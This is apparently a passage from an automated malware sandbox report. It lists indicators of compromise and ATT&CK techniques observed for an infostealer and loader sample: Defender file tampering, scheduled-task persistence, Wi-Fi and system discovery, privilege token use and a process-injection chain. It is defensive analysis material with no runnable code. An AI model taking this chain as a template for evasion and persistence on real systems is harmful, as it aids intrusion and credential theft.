File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File created	C:\Windows\xdwd.dll	nAM5wkr.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\xdwd.dll	nAM5wkr.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
File created	C:\Windows\Tasks\futors.job	amnew.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3464	sc.exe
2260	sc.exe
1836	sc.exe
1580	sc.exe
5212	sc.exe
5692	sc.exe
2960	sc.exe
4640	sc.exe
5292	sc.exe
2004	sc.exe
8	sc.exe
1316	sc.exe
1444	sc.exe
2220	sc.exe
4492	sc.exe
5148	sc.exe
4968	sc.exe
3540	sc.exe
4344	sc.exe
4448	sc.exe
1896	sc.exe
5284	sc.exe
4980	sc.exe
436	sc.exe
5820	sc.exe
2480	sc.exe
5528	sc.exe
2796	sc.exe
5916	sc.exe
4452	sc.exe
2684	sc.exe
1820	sc.exe
936	sc.exe
5500	sc.exe
4708	sc.exe
4712	sc.exe
3968	sc.exe
5524	sc.exe
4704	sc.exe
404	sc.exe
4088	sc.exe
2892	sc.exe
2028	sc.exe
2040	sc.exe
2896	sc.exe
348	sc.exe
536	sc.exe
5420	sc.exe
5380	sc.exe
1560	sc.exe
4340	sc.exe
4200	sc.exe
212	sc.exe
3428	sc.exe
3284	sc.exe
3752	sc.exe
228	sc.exe
5356	sc.exe
4380	sc.exe
3448	sc.exe
5772	sc.exe
4216	sc.exe
4764	sc.exe
2668	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
6712	5928	WerFault.exe	409
6176	1516	WerFault.exe	444

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	555d5afd67.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PowerShell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	73a0821db9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	feb9141ed1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	07d0c5035d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2b3f7991fc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gLLOqKC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b35e26dfa6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bprz1VA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bprz1VA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1f9e17497b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fc4df60a0c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FOm9tvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aa8acb4459.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6e8a51d5f0.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4864	cmd.exe
5768	netsh.exe
224	cmd.exe
920	netsh.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	1f9e17497b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	1f9e17497b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
4828	timeout.exe
5088	timeout.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	nAM5wkr.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4280	schtasks.exe
2608	schtasks.exe
4172	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5956	powershell.exe
5956	powershell.exe
5000	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
5000	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
1168	rapes.exe
1168	rapes.exe
2356	73a0821db9.exe
2356	73a0821db9.exe
4728	555d5afd67.exe
4728	555d5afd67.exe
4728	555d5afd67.exe
4728	555d5afd67.exe
4728	555d5afd67.exe
4728	555d5afd67.exe
464	MSBuild.exe
464	MSBuild.exe
464	MSBuild.exe
464	MSBuild.exe
4080	rapes.exe
4080	rapes.exe
5160	Built.exe
5160	Built.exe
5760	Built.exe
5760	Built.exe
2212	MSBuild.exe
2212	MSBuild.exe
2212	MSBuild.exe
2212	MSBuild.exe
5564	MSBuild.exe
5564	MSBuild.exe
5564	MSBuild.exe
5564	MSBuild.exe
1356	powershell.exe
1356	powershell.exe
2640	tasklist.exe
2640	tasklist.exe
964	WMIC.exe
964	WMIC.exe
2320	powershell.exe
2320	powershell.exe
1356	powershell.exe
1356	powershell.exe
2320	powershell.exe
2320	powershell.exe
1356	powershell.exe
2320	powershell.exe
3256	FOm9tvc.exe
3256	FOm9tvc.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe
1540	RegAsm.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
5720	chrome.exe
5720	chrome.exe
5720	chrome.exe
5720	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
3884	msedge.exe
3884	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5956	powershell.exe
Token: SeDebugPrivilege	924	nAM5wkr.exe
Token: SeDebugPrivilege	4168	xdwdkernel.exe
Token: SeIncBasePriorityPrivilege	4168	xdwdkernel.exe
Token: SeDebugPrivilege	1456	xdwdkernel.exe
Token: SeIncreaseQuotaPrivilege	964	WMIC.exe
Token: SeSecurityPrivilege	964	WMIC.exe
Token: SeTakeOwnershipPrivilege	964	WMIC.exe
Token: SeLoadDriverPrivilege	964	WMIC.exe
Token: SeSystemProfilePrivilege	964	WMIC.exe
Token: SeSystemtimePrivilege	964	WMIC.exe
Token: SeProfSingleProcessPrivilege	964	WMIC.exe
Token: SeIncBasePriorityPrivilege	964	WMIC.exe
Token: SeCreatePagefilePrivilege	964	WMIC.exe
Token: SeBackupPrivilege	964	WMIC.exe
Token: SeRestorePrivilege	964	WMIC.exe
Token: SeShutdownPrivilege	964	WMIC.exe
Token: SeDebugPrivilege	964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	964	WMIC.exe
Token: SeRemoteShutdownPrivilege	964	WMIC.exe
Token: SeUndockPrivilege	964	WMIC.exe
Token: SeManageVolumePrivilege	964	WMIC.exe
Token: 33	964	WMIC.exe
Token: 34	964	WMIC.exe
Token: 35	964	WMIC.exe
Token: 36	964	WMIC.exe
Token: SeDebugPrivilege	2640	tasklist.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeIncreaseQuotaPrivilege	964	WMIC.exe
Token: SeSecurityPrivilege	964	WMIC.exe
Token: SeTakeOwnershipPrivilege	964	WMIC.exe
Token: SeLoadDriverPrivilege	964	WMIC.exe
Token: SeSystemProfilePrivilege	964	WMIC.exe
Token: SeSystemtimePrivilege	964	WMIC.exe
Token: SeProfSingleProcessPrivilege	964	WMIC.exe
Token: SeIncBasePriorityPrivilege	964	WMIC.exe
Token: SeCreatePagefilePrivilege	964	WMIC.exe
Token: SeBackupPrivilege	964	WMIC.exe
Token: SeRestorePrivilege	964	WMIC.exe
Token: SeShutdownPrivilege	964	WMIC.exe
Token: SeDebugPrivilege	964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	964	WMIC.exe
Token: SeRemoteShutdownPrivilege	964	WMIC.exe
Token: SeUndockPrivilege	964	WMIC.exe
Token: SeManageVolumePrivilege	964	WMIC.exe
Token: 33	964	WMIC.exe
Token: 34	964	WMIC.exe
Token: 35	964	WMIC.exe
Token: 36	964	WMIC.exe
Token: SeDebugPrivilege	1540	RegAsm.exe
Token: SeShutdownPrivilege	5720	chrome.exe
Token: SeCreatePagefilePrivilege	5720	chrome.exe
Token: SeShutdownPrivilege	5720	chrome.exe
Token: SeCreatePagefilePrivilege	5720	chrome.exe
Token: SeShutdownPrivilege	5720	chrome.exe
Token: SeCreatePagefilePrivilege	5720	chrome.exe
Token: SeShutdownPrivilege	5720	chrome.exe
Token: SeCreatePagefilePrivilege	5720	chrome.exe
Token: SeShutdownPrivilege	5564	chrome.exe
Token: SeCreatePagefilePrivilege	5564	chrome.exe
Token: SeShutdownPrivilege	5564	chrome.exe
Token: SeCreatePagefilePrivilege	5564	chrome.exe
Token: SeShutdownPrivilege	5564	chrome.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5720	chrome.exe
5720	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5564	chrome.exe
5404	Bell_Setup16.tmp
3884	msedge.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 452 wrote to memory of 468	452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 452 wrote to memory of 468	452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 452 wrote to memory of 468	452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 452 wrote to memory of 4164	452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 452 wrote to memory of 4164	452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 452 wrote to memory of 4164	452	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 468 wrote to memory of 4172	468	cmd.exe	89
PID 468 wrote to memory of 4172	468	cmd.exe	89
PID 468 wrote to memory of 4172	468	cmd.exe	89
PID 4164 wrote to memory of 5956	4164	mshta.exe	91
PID 4164 wrote to memory of 5956	4164	mshta.exe	91
PID 4164 wrote to memory of 5956	4164	mshta.exe	91
PID 5956 wrote to memory of 5000	5956	powershell.exe	99
PID 5956 wrote to memory of 5000	5956	powershell.exe	99
PID 5956 wrote to memory of 5000	5956	powershell.exe	99
PID 5000 wrote to memory of 1168	5000	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE	100
PID 5000 wrote to memory of 1168	5000	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE	100
PID 5000 wrote to memory of 1168	5000	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE	100
PID 1168 wrote to memory of 2356	1168	rapes.exe	104
PID 1168 wrote to memory of 2356	1168	rapes.exe	104
PID 1168 wrote to memory of 2356	1168	rapes.exe	104
PID 1168 wrote to memory of 5980	1168	rapes.exe	105
PID 1168 wrote to memory of 5980	1168	rapes.exe	105
PID 1168 wrote to memory of 5980	1168	rapes.exe	105
PID 5980 wrote to memory of 2056	5980	feb9141ed1.exe	106
PID 5980 wrote to memory of 2056	5980	feb9141ed1.exe	106
PID 5980 wrote to memory of 2056	5980	feb9141ed1.exe	106
PID 2056 wrote to memory of 5808	2056	221.exe	108
PID 2056 wrote to memory of 5808	2056	221.exe	108
PID 5808 wrote to memory of 5412	5808	cmd.exe	110
PID 5808 wrote to memory of 5412	5808	cmd.exe	110
PID 5808 wrote to memory of 5412	5808	cmd.exe	110
PID 5412 wrote to memory of 5080	5412	221.exe	111
PID 5412 wrote to memory of 5080	5412	221.exe	111
PID 5080 wrote to memory of 3284	5080	cmd.exe	113
PID 5080 wrote to memory of 3284	5080	cmd.exe	113
PID 5080 wrote to memory of 2796	5080	cmd.exe	114
PID 5080 wrote to memory of 2796	5080	cmd.exe	114
PID 5080 wrote to memory of 5088	5080	cmd.exe	115
PID 5080 wrote to memory of 5088	5080	cmd.exe	115
PID 5080 wrote to memory of 1560	5080	cmd.exe	116
PID 5080 wrote to memory of 1560	5080	cmd.exe	116
PID 5080 wrote to memory of 5292	5080	cmd.exe	117
PID 5080 wrote to memory of 5292	5080	cmd.exe	117
PID 5080 wrote to memory of 4980	5080	cmd.exe	118
PID 5080 wrote to memory of 4980	5080	cmd.exe	118
PID 5080 wrote to memory of 4396	5080	cmd.exe	119
PID 5080 wrote to memory of 4396	5080	cmd.exe	119
PID 5080 wrote to memory of 5916	5080	cmd.exe	120
PID 5080 wrote to memory of 5916	5080	cmd.exe	120
PID 5080 wrote to memory of 4380	5080	cmd.exe	121
PID 5080 wrote to memory of 4380	5080	cmd.exe	121
PID 5080 wrote to memory of 4384	5080	cmd.exe	122
PID 5080 wrote to memory of 4384	5080	cmd.exe	122
PID 5080 wrote to memory of 3464	5080	cmd.exe	123
PID 5080 wrote to memory of 3464	5080	cmd.exe	123
PID 5080 wrote to memory of 5524	5080	cmd.exe	124
PID 5080 wrote to memory of 5524	5080	cmd.exe	124
PID 5080 wrote to memory of 512	5080	cmd.exe	125
PID 5080 wrote to memory of 512	5080	cmd.exe	125
PID 5080 wrote to memory of 4448	5080	cmd.exe	126
PID 5080 wrote to memory of 4448	5080	cmd.exe	126
PID 5080 wrote to memory of 4492	5080	cmd.exe	127
PID 5080 wrote to memory of 4492	5080	cmd.exe	127

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

